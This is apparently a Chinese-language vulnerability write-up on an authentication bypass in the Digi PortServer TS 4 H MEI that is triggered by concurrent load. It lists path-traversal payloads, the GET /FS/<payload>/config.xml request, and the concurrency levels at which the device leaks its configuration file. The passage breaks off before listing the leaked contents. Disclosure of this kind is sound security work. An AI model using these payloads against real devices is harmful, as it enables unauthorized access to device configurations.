在 Digi PortServer TS 4 H MEI 中发现了一个未经身份验证、由负载引发的身份验证绕过漏洞,允许在无有效凭据的情况下检索本地设备配置文件。在并发请求负载增加时,Web 服务器会在身份验证检查完成之前开始提供文件内容——这很可能是通过饱和的连接/请求队列落入文件处理器,而非身份验证检查本身存在明显的逻辑缺陷。
已测试固件:82000747_V1(2012年6月2日)和 82000747_AB(2025年9月4日)。
../../../../../../../
../../../../../../..
/../../../../../../../
/../../../../../../..
..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..
\..\..\..\..\..\..\..\..
..2f..2f..2f..2f..2f..2f..2f
..2f..2f..2f..2f..2f..2f..
4 2f..2f..2f..2f..2f..2f..2f..2f
2f..2f..2f..2f..2f..2f..2f..
/.\\./.\\./.\\./.\\./.\\./.\\./
..//..//..//..//..//
//..//..//..//..//..//
//..//..//..//..//..//
对 GET /FS/<载荷>/config.xml 的请求通常返回 401 Unauthorized。当以低并发(1 个线程,1 秒延迟)发送相同请求时,设备始终能在身份验证前正确拒绝该请求。
随着并发度增加(在 5、6、10 和 20 个并发请求下测试),设备开始间歇性地返回 HTTP/0.9 响应(无响应头,仅包含响应体),其中包含 config.xml 的完整内容——且未进行任何身份验证质询。这表明固件的 HTTP 处理器具有固定的请求处理容量,一旦超出该容量,请求即可完全绕过身份验证检查。
泄露的配置文件包括: